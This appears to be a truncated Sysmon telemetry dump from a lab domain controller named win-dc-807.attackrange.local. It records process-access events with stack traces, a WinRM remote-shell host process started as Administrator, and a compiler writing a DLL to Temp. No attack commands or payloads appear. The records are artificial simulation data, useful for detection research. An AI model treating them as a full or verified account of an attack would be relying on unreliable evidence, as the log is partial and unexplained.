15:50:19.794{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3B-5FA1-F002-000000008701}816C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000057Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.779{D28789B6-7C3B-5FA1-F102-000000008701}15444764C:\Windows\system32\conhost.exe{D28789B6-7C3B-5FA1-F002-000000008701}816C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000056Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.779{D28789B6-7AC1-5FA1-0500-000000008701}6361160C:\Windows\system32\csrss.exe{D28789B6-7C3B-5FA1-F102-000000008701}1544C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000055Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.763{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000054Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.763{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000053Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.763{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000052Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.763{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000051Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.763{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000050Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.763{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000049Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.763{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.763{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.763{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.763{D28789B6-7AC1-5FA1-0500-000000008701}636652C:\Windows\system32\csrss.exe{D28789B6-7C3B-5FA1-F002-000000008701}816C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000045Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.763{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3B-5FA1-F002-000000008701}816C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000044Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.775{D28789B6-7C3B-5FA1-F002-000000008701}816C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{D28789B6-7C3B-5FA1-858E-100000000000}0x108e850HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{D28789B6-7AD1-5FA1-0C00-000000008701}572C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x800000000000000043Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.763{D28789B6-7ACF-5FA1-0B00-000000008701}860916C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.763{D28789B6-7ACF-5FA1-0B00-000000008701}860916C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.763{D28789B6-7ACF-5FA1-0B00-000000008701}860916C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.669{D28789B6-7ACF-5FA1-0B00-000000008701}860916C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.669{D28789B6-7ACF-5FA1-0B00-000000008701}860916C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000038Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.669{D28789B6-7ACF-5FA1-0B00-000000008701}860916C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000037Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.669{D28789B6-7ACF-5FA1-0B00-000000008701}860916C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000036Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.669{D28789B6-7ACF-5FA1-0B00-000000008701}860916C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000035Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.669{D28789B6-7ACF-5FA1-0B00-000000008701}860916C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x8000000000000000160Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:50:20.763{D28789B6-7C3C-5FA1-F602-000000008701}4484C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\jfxp3ykk.dll2020-11-03 15:50:20.623 10341000x8000000000000000159Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:20.763{D28789B6-7C3B-5FA1-F102-000000008701}15444764C:\Windows\system32\conhost.exe{D28789B6-7C3C-5FA1-F702-000000008701}4716C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000158Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:20.748{D28789B6-7AC1-5FA1-0500-000000008701}6361160C:\Windows\system32\csrss.exe{D28789B6-7C3C-5FA1-F702-000000008701}4716C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000157Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 